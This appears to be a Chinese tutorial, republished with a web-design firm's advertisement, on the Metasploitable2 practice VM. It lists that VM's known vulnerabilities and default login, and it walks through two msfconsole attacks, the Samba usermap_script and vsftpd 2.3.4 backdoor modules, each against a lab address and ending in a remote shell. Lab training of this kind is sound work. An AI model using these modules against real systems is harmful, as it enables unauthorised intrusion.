本篇文章為大家展示了如何分析Metasploit中的Metasploitable2��,內(nèi)容簡明扼要并且容易理解���,絕對能使你眼前一亮���,通過這篇文章的詳細(xì)介紹希望你能有所收獲����。
成都創(chuàng)新互聯(lián)公司成立與2013年����,是專業(yè)互聯(lián)網(wǎng)技術(shù)服務(wù)公司�,擁有項目成都網(wǎng)站建設(shè)��、網(wǎng)站建設(shè)網(wǎng)站策劃��,項目實施與項目整合能力�����。我們以讓每一個夢想脫穎而出為使命����,1280元長島做網(wǎng)站,已為上家服務(wù),為長島各地企業(yè)和個人服務(wù),聯(lián)系電話:13518219792
一、Metasploitable2簡介
Metasploitable2虛擬系統(tǒng)是一個特別制作的ubuntu操作系統(tǒng)�,本身設(shè)計目的是作為安全工具測試和演示常見漏洞攻擊的環(huán)境。其中最重要的是可以用來作為MSF攻擊用的靶機���。
開放了很多的高危端口如21�、23���、445等�����,而且具有很多未打補丁的高危漏洞��, 如Samba MS-RPC Shell命令注入漏洞等�,而且對外開放了很多服務(wù),并且數(shù)據(jù)庫允許外聯(lián)等�。系統(tǒng)中的用戶口令均為弱口令。系統(tǒng)搭載了DVWA���、Mutillidae等Web漏洞演練平臺���。
Metasploit able 2是一個虛擬機文件, 從網(wǎng)上下載解壓之后就可以直接使用�����,不需要自己安裝���。
下載地址:
https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
用戶名:msfadmin 密碼:msfadmin
二��、Metasploitable2漏洞列表
1�、弱口令漏洞(如vnc、MySQL�、PostgreSQL等)
2、Samba MS-RPC Shell命令注入漏洞
3���、Vsftpd源碼包后門漏洞
4����、UnreallRCd后門漏洞
5�、Linux NFS共享目錄配置漏洞
6�����、Java RMI SERVER命令執(zhí)行漏洞
7��、Tomcat管理臺默認(rèn)口令漏洞
8�、root用戶弱口令漏洞(SSH爆破)
9、Distcc后門漏洞
10���、Samba sysmlink默認(rèn)配置目錄遍歷漏洞
11���、PHP CGI參數(shù)注入執(zhí)行漏洞
12、DRuby遠程代碼執(zhí)行漏洞
13、Ingreslock后門漏洞
14���、Rlogin后門漏洞
三��、Samba MS-RPC Shell命令注入漏洞
漏洞產(chǎn)生原因:傳遞通過MS-RPC提供的未過濾的用戶 輸入在調(diào)用定義的外部腳本時調(diào)用/bin/sh�,在smb.conf中�,導(dǎo)致允許遠程命令執(zhí)行。
攻擊機:kali linux IP:192.168.1.133
靶機:Metasploitable2 IP:192.168.1.131
1�����、啟動數(shù)據(jù)庫并且打開metasploit控制臺:msfconsole
2�、搜索可利用的模塊:search samba
3、選擇要利用的模塊:use exploit/multi/samba/usermap_script
查看需要設(shè)置的參數(shù):show options
需要設(shè)置目標(biāo)ip和端口(默認(rèn)139)
4�����、設(shè)置目標(biāo)主機地址:192.168.1.131
5��、運行:run 此時已建立shell連接
6��、查看目標(biāo)主機目錄文件:ls
四�、Vsftpd源碼包后門漏洞
漏洞產(chǎn)生原因:在特定版本的vsftpd服務(wù)器程序中, 被人惡意植入代碼���,當(dāng)用戶名以“:)”為結(jié)尾����,服務(wù)器就會在6200端口監(jiān)聽,并且能夠執(zhí)行任意惡意代碼�。
攻擊機:kali linux IP:192.168.1.133
靶機:Metasploitable2 IP:192.168.1.136
1、搜索可用攻擊模塊:search vsftpd
2�、選擇要利用的模塊:useexploit/unix/ftp/vsftpd_234_backdoor
查看需要設(shè)置的參數(shù):show options
需要設(shè)置目標(biāo)ip和端口(默認(rèn)21)
3、設(shè)置目標(biāo)主機地址:192.168.1.136
4��、 運行:run 此時已建立shell連接
5���、查看目標(biāo)主機目錄文件:ls
上述內(nèi)容就是如何分析Metasploit中的Metasploitable2���,你們學(xué)到知識或技能了嗎�����?如果還想學(xué)到更多技能或者豐富自己的知識儲備����,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。
網(wǎng)站題目:如何分析Metasploit中的Metasploitable2
URL鏈接:
http://weahome.cn/article/gdodgp.html
重慶分公司
重慶分公司
